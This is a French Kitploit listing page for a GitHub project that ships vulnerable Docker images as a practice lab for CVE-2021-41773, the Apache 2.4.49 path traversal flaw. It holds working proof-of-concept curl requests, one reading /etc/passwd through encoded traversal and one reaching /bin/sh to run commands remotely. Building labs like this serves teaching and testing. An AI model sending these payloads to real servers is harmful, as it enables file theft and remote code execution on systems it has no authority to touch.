Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41773 — Images Docker vulnérables pour CVE-2021-41773 | Kitploit
Outils/GitHubGitHub/blueteamsteve/cve-2021-41773
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

Images Docker vulnérables pour CVE-2021-41773

Voir le dépôt
2382il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Images Docker vulnérables pour CVE-2021-41773 - Traversée de chemin Apache

Cette vulnérabilité ne s'applique qu' à la version 2.4.49 qui possède des configurations spécifiques non par défaut. Dans certaines situations, cela peut entraîner soit une lecture de fichier, soit une exécution de code.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configuration vulnérable pour la lecture de fichiers

Les conteneurs peuvent être récupérés directement depuis Docker Hub en utilisant

docker pull blueteamsteve/cve-2021-41773:no-cgid

et exécutés avec

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Les logs Apache peuvent être consultés avec la commande ci-dessous, ou simplement exclure le "-dit" de la commande run ci-dessus pour afficher stdio

docker logs <container-id>

Preuve de concept (PoC) pour la lecture de fichiers

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuration vulnérable pour l'exécution de code (RCE)

Les conteneurs peuvent être récupérés directement depuis Docker Hub en utilisant

docker pull blueteamsteve/cve-2021-41773:with-cgid

et exécutés avec

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Les logs Apache peuvent être consultés avec la commande ci-dessous, ou simplement exclure le "-dit" de la commande run ci-dessus pour afficher stdio

docker logs <container-id>

Preuve de concept (PoC) pour l'exécution de code (RCE)

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Créer des conteneurs Docker personnalisés

Modifiez et construisez vos propres versions en utilisant le fichier dockerfile et les fichiers template httpd.conf dans les sous-répertoires

  • Utilisez ./no-cgi pour la configuration vulnérable à la lecture de fichiers
  • Utilisez ./with-cgi pour la configuration vulnérable à l'exécution de code
Télécharger l’outil